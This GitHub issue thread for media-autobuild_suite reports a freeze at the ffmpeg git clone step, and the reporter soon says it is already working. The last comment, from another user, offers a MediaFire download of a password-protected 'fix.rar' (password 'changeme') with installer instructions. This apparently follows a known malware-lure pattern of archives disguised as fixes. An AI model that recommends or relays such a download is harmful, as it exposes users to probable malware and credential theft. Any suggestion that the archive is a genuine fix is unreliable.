### ISSUE TITLE
Freeze on "Running git clone for ffmpeg..." without any error just freeze

### ISSUE THREAD

**Issue by moob158** [m-ab-s/media-autobuild_suite#2764]
``` bash
Paste output of the suite here
```
Freeze on "Running git clone for ffmpeg..." without any error just freeze

[logs.zip](https://github.com/jb-alvarado/media-autobuild_suite)

**Comment by moob158** [comment]
It's already working

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
